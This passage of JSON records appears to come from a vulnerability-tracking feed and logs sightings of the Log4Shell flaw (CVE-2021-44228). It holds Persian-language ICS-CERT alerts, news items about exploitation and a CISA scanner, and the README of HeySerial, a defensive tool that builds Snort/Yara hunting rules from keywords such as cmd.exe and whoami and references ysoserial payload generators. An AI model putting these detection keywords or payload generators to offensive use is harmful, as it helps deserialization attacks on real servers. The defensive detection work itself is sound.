"2021-12-15T08:51:31.000000Z"}, {"uuid": "00c7b46c-6ede-4a2b-a901-d5caebca3e9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/ics_cert/506", "content": "\ud83d\udd34 \u0647\u0634\u062f\u0627\u0631 \u062f\u0631 \u062e\u0635\u0648\u0635 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u062d\u0631\u0627\u0646\u06cc Apache\n\ud83d\udcdd \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062c\u062f\u06cc\u062f \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 Log4j2 \u062f\u0631 Apache \u0627\u0645\u06a9\u0627\u0646 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0631\u0627 \u0628\u0631\u0627\u06cc \u0645\u0647\u0627\u062c\u0645 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc \u06a9\u0646\u062f.\n\u0634\u0646\u0627\u0633\u0647 \u0622\u0633\u06cc\u0628\u00ad \u067e\u0630\u06cc\u0631\u06cc:\nCVE-2021-44228\n\n\ud83d\udc6e\u200d\u2640\ufe0f\ud83d\udc6e\u200d\u2640\ufe0f \u0628\u0627\u0632\u0646\u0634\u0631 \u0645\u0637\u0627\u0644\u0628 \u0627\u06cc\u0646 \u06a9\u0627\u0646\u0627\u0644 \u0635\u0631\u0641\u0627 \u0628\u0627 \u0630\u06a9\u0631 \u0645\u0646\u0628\u0639 \u0648 \u0622\u062f\u0631\u0633 \u06a9\u0627\u0645\u0644 \u06a9\u0627\u0646\u0627\u0644 \u0645\u062c\u0627\u0632 \u0645\u06cc\u0628\u0627\u0634\u062f.\n\n\ud83c\udfed\u0648\u0628\u0633\u0627\u06cc\u062a \u0648 \u06a9\u0627\u0646\u0627\u0644 \u062a\u062e\u0635\u0635\u06cc \u0627\u0645\u0646\u06cc\u062a \u0632\u06cc\u0631\u0633\u0627\u062e\u062a\u0647\u0627\u06cc \u0627\u062a\u0648\u0645\u0627\u0633\u06cc\u0648\u0646 \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0635\u0646\u0639\u062a\u06cc\n\n\u0627\u062f\u0645\u06cc\u0646:\nhttps://t.me/pedram_kiani\n\u06a9\u0627\u0646\u0627\u0644 \u062a\u0644\u06af\u0631\u0627\u0645:\nhttps://t.me/ics_cert", "creation_timestamp": "2021-12-12T05:54:25.000000Z"}, {"uuid": "3acbb178-f4a4-47c1-96d8-02574df8776b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/ics_cert/507", "content": "\u0641\u0648\u0631\u06cc: \u0628\u0646\u06cc\u0627\u062f \u0622\u067e\u0627\u0686\u06cc \u0648\u0635\u0644\u0647 \u062c\u062f\u06cc\u062f\u06cc (CVE-2021-45046) \u0628\u0631\u0627\u06cc \u0627\u0628\u0632\u0627\u0631 #Log4j \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a\u060c \u067e\u0633 \u0627\u0632 \u0627\u06cc\u0646\u06a9\u0647 \u0648\u0635\u0644\u0647 \u0642\u0628\u0644\u06cc \u0628\u0631\u0627\u06cc \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc #Log4Shell \u0627\u062e\u06cc\u0631\u0627\u064b \u0641\u0627\u0634 \u0634\u062f\u0647 (CVE-2021-44228) \u062f\u0631 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0647\u0627\u06cc \u063a\u06cc\u0631 \u067e\u06cc\u0634 \u0641\u0631\u0636 \u0646\u0627\u0642\u0635 \u062a\u0644\u0642\u06cc \u0634\u062f.\n\n \u062c\u0632\u0626\u06cc\u0627\u062a: https://lnkd.in/eFjkK6Zv\n\n #infosec #\u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc #\u0627\u0645\u0646\u06cc\u062a \u06a9\u0627\u0645\u067e\u06cc\u0648\u062a\u0631\u06cc #\u0641\u0646\u0627\u0648\u0631\u06cc\n\n\ud83d\udc6e\u200d\u2640\ufe0f\ud83d\udc6e\u200d\u2640\ufe0f \u0628\u0627\u0632\u0646\u0634\u0631 \u0645\u0637\u0627\u0644\u0628 \u0627\u06cc\u0646 \u06a9\u0627\u0646\u0627\u0644 \u0635\u0631\u0641\u0627 \u0628\u0627 \u0630\u06a9\u0631 \u0645\u0646\u0628\u0639 \u0648 \u0622\u062f\u0631\u0633 \u06a9\u0627\u0645\u0644 \u06a9\u0627\u0646\u0627\u0644 \u0645\u062c\u0627\u0632 \u0645\u06cc\u0628\u0627\u0634\u062f.\n\n\ud83c\udfed\u0648\u0628\u0633\u0627\u06cc\u062a \u0648 \u06a9\u0627\u0646\u0627\u0644 \u062a\u062e\u0635\u0635\u06cc \u0627\u0645\u0646\u06cc\u062a \u0632\u06cc\u0631\u0633\u0627\u062e\u062a\u0647\u0627\u06cc \u0627\u062a\u0648\u0645\u0627\u0633\u06cc\u0648\u0646 \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0635\u0646\u0639\u062a\u06cc\n\n\u0627\u062f\u0645\u06cc\u0646:\nhttps://t.me/pedram_kiani\n\u06a9\u0627\u0646\u0627\u0644 \u062a\u0644\u06af\u0631\u0627\u0645:\nhttps://t.me/ics_cert", "creation_timestamp": "2021-12-15T12:20:56.000000Z"}, {"uuid": "681d4147-d87c-43ab-bc18-cbee2f0b2958", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/ics_cert/555", "content": "\ud83d\udea8\u0647\u0634\u062f\u0627\u0631\n  \n\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0647\u0627\u06cc Log4Shell \u0647\u0646\u0648\u0632 \u0628\u0631\u0627\u06cc \u0647\u06a9 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc VMware \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u0634\u0648\u062f\n\n\u0639\u0648\u0627\u0645\u0644 \u062a\u0647\u062f\u06cc\u062f\u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u06af\u0631\u0648\u0647\u200c\u0647\u0627\u06cc \u0647\u06a9 \u062a\u062d\u062a \u062d\u0645\u0627\u06cc\u062a \u062f\u0648\u0644\u062a\u200c\u0647\u0627\u060c \u0647\u0645\u0686\u0646\u0627\u0646 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc VMware Horizon \u0648 Unified Access Gateway (UAG) \u0631\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 Log4Shell (CVE-2021-44228) \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u062f\u0647\u0646\u062f.\n\u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0632 Log4Shell \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0628\u0631 \u0631\u0648\u06cc \u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u06a9\u0647 \u062f\u0631 \u0645\u0639\u0631\u0636 \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u062d\u0644\u06cc \u06cc\u0627 \u0627\u06cc\u0646\u062a\u0631\u0646\u062a\u06cc \u0647\u0633\u062a\u0646\u062f \u0628\u0631\u0627\u06cc \u062d\u0631\u06a9\u062a \u062c\u0627\u0646\u0628\u06cc \u062f\u0631 \u0634\u0628\u06a9\u0647\u200c\u0647\u0627 \u062a\u0627 \u0632\u0645\u0627\u0646\u06cc \u06a9\u0647 \u0628\u0647 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u062f\u0627\u062e\u0644\u06cc \u062d\u0627\u0648\u06cc \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0633 \u062f\u0633\u062a\u0631\u0633\u06cc \u067e\u06cc\u062f\u0627 \u06a9\u0646\u0646\u062f\u060c \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u0646\u062f.\n\u067e\u0633 \u0627\u0632 \u0627\u0641\u0634\u0627\u06cc \u0622\u0646 \u062f\u0631 \u062f\u0633\u0627\u0645\u0628\u0631 2021\u060c \u0686\u0646\u062f\u06cc\u0646 \u0639\u0627\u0645\u0644 \u062a\u0647\u062f\u06cc\u062f \u0634\u0631\u0648\u0639 \u0628\u0647 \u0627\u0633\u06a9\u0646 \u0648 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0627\u0635\u0644\u0627\u062d\u200c\u0646\u0634\u062f\u0647 \u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u06af\u0631\u0648\u0647\u200c\u0647\u0627\u06cc \u0647\u06a9 \u062a\u062d\u062a \u062d\u0645\u0627\u06cc\u062a \u062f\u0648\u0644\u062a \u0627\u0632 \u0686\u06cc\u0646\u060c \u06a9\u0631\u0647 \u0634\u0645\u0627\u0644\u06cc \u0648 \u062a\u0631\u06a9\u06cc\u0647\u060c \u0648 \u0647\u0645\u0686\u0646\u06cc\u0646 \u0686\u0646\u062f\u06cc\u0646 \u0648\u0627\u0633\u0637\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u06a9\u0647 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u062a\u0648\u0633\u0637 \u0628\u0627\u062c\u200c\u0627\u0641\u0632\u0627\u0631\u0647\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f\u060c \u06a9\u0631\u062f\u0646\u062f.\n\n\u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc \u0622\u0645\u0631\u06cc\u06a9\u0627 \u0627\u0639\u0644\u0627\u0645 \u06a9\u0631\u062f \u0633\u0631\u0648\u0631\u0647\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u0647\u0627\u06cc Log4Shell \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u0648\u0644\u06cc\u0647 \u0628\u0647 \u0634\u0628\u06a9\u0647\u200c\u0647\u0627\u06cc \u0633\u0627\u0632\u0645\u0627\u0646\u200c\u0647\u0627\u06cc \u0647\u062f\u0641 \u0628\u0647 \u062e\u0637\u0631 \u0627\u0641\u062a\u0627\u062f\u0647\u200c\u0627\u0646\u062f.\n\u067e\u0633 \u0627\u0632 \u0646\u0641\u0648\u0630 \u0628\u0647 \u0634\u0628\u06a9\u0647\u200c\u0647\u0627\u060c \u0622\u0646\u200c\u0647\u0627 \u0627\u0646\u0648\u0627\u0639 \u0628\u062f\u0627\u0641\u0632\u0627\u0631\u0647\u0627\u06cc \u0645\u062e\u062a\u0644\u0641 \u0631\u0627 \u0645\u0633\u062a\u0642\u0631 \u06a9\u0631\u062f\u0646\u062f \u0648 \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0645\u0648\u0631\u062f \u0646\u06cc\u0627\u0632 \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u0628\u0627\u0631\u0647\u0627\u06cc \u0627\u0636\u0627\u0641\u06cc \u0648 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0635\u062f\u0647\u0627 \u06af\u06cc\u06af\u0627\u0628\u0627\u06cc\u062a \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u0631\u0627 \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u0622\u0646\u0647\u0627 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0646\u062f.\n\u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u0628\u062e\u0634\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc\u060c \u0628\u0627\u0632\u06cc\u06af\u0631\u0627\u0646 \u0645\u0634\u06a9\u0648\u06a9 APT \u0628\u062f\u0627\u0641\u0632\u0627\u0631 \u0644\u0648\u062f\u0631 \u0631\u0627 \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645 \u0647\u0627\u06cc \u062f\u0631 \u0645\u0639\u0631\u0636 \u062e\u0637\u0631 \u0628\u0627 \u0641\u0627\u06cc\u0644 \u0647\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc\u06cc \u062a\u0639\u0628\u06cc\u0647 \u0634\u062f\u0647 \u06a9\u0647 \u0641\u0631\u0645\u0627\u0646 \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 (C2) \u0631\u0627 \u0627\u0645\u06a9\u0627\u0646 \u067e\u0630\u06cc\u0631 \u0645\u06cc \u06a9\u0646\u062f\u060c \u06a9\u0627\u0634\u062a\u0647 \u0627\u0646\u062f .\n\u062f\u0631 \u06cc\u06a9 \u0646\u0634\u0633\u062a \u062a\u0627\u06cc\u06cc\u062f \u0634\u062f\u0647\u060c \u0627\u06cc\u0646 \u0628\u0627\u0632\u06cc\u06af\u0631\u0627\u0646 APT \u062a\u0648\u0627\u0646\u0633\u062a\u0646\u062f \u0628\u0647 \u0635\u0648\u0631\u062a \u062c\u0627\u0646\u0628\u06cc \u062f\u0631 \u062f\u0627\u062e\u0644 \u0634\u0628\u06a9\u0647 \u062d\u0631\u06a9\u062a \u06a9\u0646\u0646\u062f\u060c \u0628\u0647 \u0634\u0628\u06a9\u0647 \u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u0641\u0627\u062c\u0639\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u067e\u06cc\u062f\u0627 \u06a9\u0646\u0646\u062f\u060c \u0648 \u062f\u0627\u062f\u0647 \u0647\u0627\u06cc \u062d\u0633\u0627\u0633 \u0631\u0627 \u062c\u0645\u0639 \u0622\u0648\u0631\u06cc \u0648 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u06a9\u0646\u0646\u062f.\n\n\u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc VMware \u0648\u0635\u0644\u0647\u200c\u0646\u0634\u062f\u0647 \u0628\u0627\u06cc\u062f \u0628\u0647 \u062e\u0637\u0631 \u0627\u0641\u062a\u0627\u062f\u0647 \u062f\u0631 \u0646\u0638\u0631 \u06af\u0631\u0641\u062a\u0647 \u0634\u0648\u0646\u062f\n\n\u0628\u0647 \u0633\u0627\u0632\u0645\u0627\u0646\u200c\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0647\u0646\u0648\u0632 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc VMware \u062e\u0648\u062f \u0631\u0627 \u0627\u0635\u0644\u0627\u062d \u0646\u06a9\u0631\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u062a\u0648\u0635\u06cc\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u0622\u0646\u0647\u0627 \u0631\u0627 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u0647\u06a9 \u0634\u062f\u0647 \u0628\u0631\u0686\u0633\u0628\u200c\u06af\u0630\u0627\u0631\u06cc \u06a9\u0646\u0646\u062f \u0648 \u0631\u0648\u06cc\u0647\u200c\u0647\u0627\u06cc \u0648\u0627\u06a9\u0646\u0634 \u0628\u0647 \u062d\u0627\u062f\u062b\u0647 (IR) \u0631\u0627 \u0634\u0631\u0648\u0639 \u06a9\u0646\u0646\u062f.\n\n\u2705\u0645\u0631\u0627\u062d\u0644 \u0645\u0648\u0631\u062f \u0646\u06cc\u0627\u0632 \u0628\u0631\u0627\u06cc \u0648\u0627\u06a9\u0646\u0634 \u0645\u0646\u0627\u0633\u0628 \u062f\u0631 \u0686\u0646\u06cc\u0646 \u0634\u0631\u0627\u06cc\u0637\u06cc \u0634\u0627\u0645\u0644:\n\u062c\u062f\u0627\u0633\u0627\u0632\u06cc \u0641\u0648\u0631\u06cc \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0628\u0627\u0644\u0642\u0648\u0647 \u0622\u0633\u06cc\u0628\u200c\u062f\u06cc\u062f\u0647\u060c \u062c\u0645\u0639\u200c\u0622\u0648\u0631\u06cc \u0648 \u0628\u0631\u0631\u0633\u06cc \u0644\u0627\u06af\u200c\u0647\u0627 \u0648 \u0645\u0648\u0627\u0631\u062f \u0645\u0631\u0628\u0648\u0637\u0647\u060c \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u06a9\u0627\u0631\u0634\u0646\u0627\u0633\u0627\u0646 IR \u0634\u062e\u0635 \u062b\u0627\u0644\u062b (\u062f\u0631 \u0635\u0648\u0631\u062a \u0646\u06cc\u0627\u0632)\u060c \u0648 \u06af\u0632\u0627\u0631\u0634 \u062d\u0627\u062f\u062b\u0647 \u0628\u0647 \u0645\u0631\u0627\u062c\u0639 \u0645\u0644\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u0633\u062a.\n\u0628\u0647 \u0647\u0645\u0647 \u0633\u0627\u0632\u0645\u0627\u0646\u200c\u0647\u0627\u06cc \u062f\u0627\u0631\u0627\u06cc \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u062f\u06cc\u062f\u0647 \u062a\u0648\u0635\u06cc\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0641\u0648\u0631\u0627\u064b \u0648\u0635\u0644\u0647\u200c\u0647\u0627 \u06cc\u0627 \u0631\u0627\u0647\u200c\u062d\u0644\u200c\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u0631\u0627 \u0627\u0639\u0645\u0627\u0644 \u06a9\u0646\u0646\u062f \n\n\u062a\u0648\u0635\u06cc\u0647 \u0627\u0645\u0631\u0648\u0632 \u067e\u0633 \u0627\u0632 \u0622\u0646 \u0635\u0648\u0631\u062a \u0645\u06cc \u06af\u06cc\u0631\u062f \u06a9\u0647 VMware \u0647\u0645\u0686\u0646\u06cc\u0646 \u062f\u0631 \u0645\u0627\u0647 \u0698\u0627\u0646\u0648\u06cc\u0647 \u0627\u0632 \u0645\u0634\u062a\u0631\u06cc\u0627\u0646 \u062e\u0648\u0627\u0633\u062a\u0647 \u0627\u0633\u062a \u062a\u0627 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc VMware Horizon \u062f\u0631 \u0645\u0639\u0631\u0636 \u0627\u06cc\u0646\u062a\u0631\u0646\u062a \u0631\u0627 \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u062d\u0645\u0644\u0627\u062a Log4Shell \u0627\u06cc\u0645\u0646 \u06a9\u0646\u0646\u062f.\n\u0627\u0632 \u0627\u0628\u062a\u062f\u0627\u06cc \u0633\u0627\u0644\u060c \u0633\u0631\u0648\u0631\u0647\u0627\u06cc VMware Horizon \u062a\u0648\u0633\u0637 \u0628\u0627\u0632\u06cc\u06af\u0631\u0627\u0646 \u062a\u0647\u062f\u06cc\u062f \u0686\u06cc\u0646\u06cc \u0632\u0628\u0627\u0646 \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u0628\u0627\u062c\u200c\u0627\u0641\u0632\u0627\u0631 Night Sky \u060c Lazarus Korean APT \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u062f\u0632\u062f\u0627\u0646 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0648 \u06af\u0631\u0648\u0647 \u0647\u06a9\u0631 \u0627\u06cc\u0631\u0627\u0646\u06cc TunnelVision \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u062f\u0631\u0647\u0627\u06cc \u067e\u0634\u062a\u06cc \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a\u0647\u200c\u0627\u0646\u062f.\n\u062a\u0627 \u0632\u0645\u0627\u0646\u06cc \u06a9\u0647 \u0646\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0627 \u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0647\u0645\u0647 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc VMware Horizon \u0648 UAG \u0622\u0633\u06cc\u0628\u200c\u062f\u06cc\u062f\u0647 \u0628\u0647 \u0622\u062e\u0631\u06cc\u0646 \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u060c \u0633\u0627\u062e\u062a\u200c\u0647\u0627\u06cc \u0627\u0635\u0644\u0627\u062d\u200c\u0634\u062f\u0647 \u0631\u0627 \u0646\u0635\u0628 \u06a9\u0646\u06cc\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0633\u0637\u062d \u062d\u0645\u0644\u0647 \u0631\u0627 \u00ab\u0628\u0627 \u0645\u06cc\u0632\u0628\u0627\u0646\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u0636\u0631\u0648\u0631\u06cc \u062f\u0631 \u06cc\u06a9 \u0645\u0646\u0637\u0642\u0647 \u063a\u06cc\u0631\u0646\u0638\u0627\u0645\u06cc \u062c\u062f\u0627\u0634\u062f\u0647 (DMZ)\u00bb\u060c \u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u0641\u0627\u06cc\u0631\u0648\u0627\u0644\u200c\u0647\u0627\u06cc \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628 (WAF) \u06a9\u0627\u0647\u0634 \u062f\u0647\u06cc\u062f.\n\n\ud83d\udc6e\u200d\u2640\ufe0f\ud83d\udc6e\u200d\u2640\ufe0f \u0628\u0627\u0632\u0646\u0634\u0631 \u0645\u0637\u0627\u0644\u0628 \u0627\u06cc\u0646 \u06a9\u0627\u0646\u0627\u0644 \u0635\u0631\u0641\u0627 \u0628\u0627 \u0630\u06a9\u0631 \u0645\u0646\u0628\u0639 \u0648 \u0622\u062f\u0631\u0633 \u06a9\u0627\u0645\u0644 \u06a9\u0627\u0646\u0627\u0644 \u0645\u062c\u0627\u0632 \u0645\u06cc\u0628\u0627\u0634\u062f.\n\n\ud83c\udfed\u0648\u0628\u0633\u0627\u06cc\u062a \u0648 \u06a9\u0627\u0646\u0627\u0644 \u062a\u062e\u0635\u0635\u06cc \u0627\u0645\u0646\u06cc\u062a \u0632\u06cc\u0631\u0633\u0627\u062e\u062a\u0647\u0627\u06cc \u0627\u062a\u0648\u0645\u0627\u0633\u06cc\u0648\u0646 \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0635\u0646\u0639\u062a\u06cc\n\n\u0627\u062f\u0645\u06cc\u0646:\nhttps://t.me/pedram_kiani\n\u06a9\u0627\u0646\u0627\u0644 \u062a\u0644\u06af\u0631\u0627\u0645:\nhttps://t.me/ics_cert\n\u062a\u0648\u06cc\u06cc\u062a\u0631:\nhttps://twitter.com/icscerti", "creation_timestamp": "2022-06-29T12:34:14.000000Z"}, {"uuid": "3185eb31-58b5-4d76-8c00-f471901e002b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/JFhZyUqYqqx188oJl2RaMk8fPQpcGIVg5oYylIjqjH2CZQ", "content": "", "creation_timestamp": "2021-12-12T21:45:15.000000Z"}, {"uuid": "1d07386e-3489-44de-bfae-b912f09b106b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/349", "content": "Programmatically create hunting rules for deserialization exploitation (https://www.kitploit.com/search/label/Exploitation) with multiple    keywords (e.g. cmd.exe)  gadget chains (e.g. CommonsCollection)  object types (e.g. ViewState, Java, Python Pickle, PHP)  encodings (e.g. Base64, raw)  rule types (e.g. Snort, Yara)  \n  Disclaimer  Rules generated by this tool are intended for hunting/research purposes and are not designed for high fidelity/blocking purposes.  Please test thoroughly before deploying to any production systems.  The Yara rules are primarily intended for scanning web server logs. Some of the \"object prefixes\" are only 2 bytes long, so they can make large scans a bit slow. (Translation: please don't drop them all into VT Retrohunt.)  Usage  Help:  python3 heyserial.py -h  Examples:  python3 heyserial.py -c 'ExampleChain::condition1+condition2' -t JavaObj  python3 heyserial.py -k cmd.exe whoami 'This file cannot be run in DOS mode'  python3 heyserial.py -k Process.Start -t NETViewState -e base64 \"base64+utf16le\"    Utils  utils/checkyoself.py  This is a tool to automate bulk testing of Snort and Yara rules on a variety of sample files.  Usage:  python3 checkyoself.py [-y rules.yara] [-s rules.snort] [-o file_output_prefix] [--matches] [--misses] -d malware.exe malware.pcap  Examples:  python3 checkyoself.py -y rules/javaobj -s rules/javaobj -d payloads/javaobj pcaps --misses -o java_misses  utils/generate_payloads.ps1  YSoSerial.NET v1.34 payload generation. Run on Windows from the ./utils directory.    Source: https://github.com/pwntester/ysoserial.net  License: ysoserial.net_LICENSE.txt    utils/generate_payloads.sh  YSoSerial payload generation. Run on Linux from the ./utils directory.    Source: https://github.com/frohoff/ysoserial  License: ysoserial_LICENSE.txt    utils/install_snort.sh  Installing Snort on a Debian based system was a bit finnicky for me, so I wrote my install notes here.  Use at your own risk in a VM that you have snapshotted recently.  utils/server.py  Simple Python script that runs an HTTP server on 127.0.0.1:12345 and accepts POST requests.  Handy for generating test PCAPs.  License  Copyright (C) 2021 Alyssa Rahman, Mandiant, Inc. All Rights Reserved.  Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License.  You may obtain a copy of the License at: [package root]/LICENSE.txt  Unless required by applicable law or agreed to in writing, software distributed (https://www.kitploit.com/search/label/Distributed) under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.  See the License for the specific language governing permissions and limitations under the License.  Contributing  Check out the Developers' guide (DEVELOPERS.md) for more details on extending HeySerial!  Prior Work/Related Resources  Tools    Deserialization-Cheat-Sheet (https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet) \u2013 @GrrrDog  Ysoserial (https://github.com/frohoff/ysoserial) - @frohoff  MarshalSec (https://github.com/frohoff/marshalsec) - @frohoff  Ysoserial (forked) (https://github.com/wh1t3p1g/ysoserial) - @wh1t3p1g  Ysoserial.NET (https://github.com/pwntester/ysoserial.net) and v2 branch (https://github.com/pwntester/ysoserial.net/tree/v2) - @pwntester  ViewGen (https://github.com/0xacb/viewgen) \u2013 0xacb  Rogue-JNDI (https://github.com/veracode-research/rogue-jndi) - @veracode-research    Vulnerabilities    Log4J (CVE-2021-44228 (https://www.lunasec.io/docs/blog/log4j-zero-day/))  Exchange (CVE-2021-42321 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42321))  Zoho ManageEngine (CVE-2020-10189 (https://nvd.nist.gov/vuln/detail/CVE-2020-10189))  Jira (CVE-2020-36239 (https://oxalis.io/atlassian-jira-data-centers-critical-vulnerability-what-you-need-to-know/))  Telerik (CVE-2019-18935", "creation_timestamp": "2022-05-12T22:17:01.000000Z"}, {"uuid": "b0e4862b-ce5e-41bb-bf07-0585c9916295", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BleepingComputer/11213", "content": "CISA releases Apache Log4j scanner to find vulnerable apps\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has announced the release of a scanner for identifying web services impacted by&amp; two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046. [...]\n\nhttps://www.bleepingcomputer.com/news/security/cisa-releases-apache-log4j-scanner-to-find-vulnerable-apps/", "creation_timestamp": "2021-12-22T16:57:09.000000Z"}, {"uuid": "23ffe1db-2c7d-4b15-bb56-6a5510f56e97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BleepingComputer/11166", "content": "Log4j vulnerability now used by state-backed hackers, access 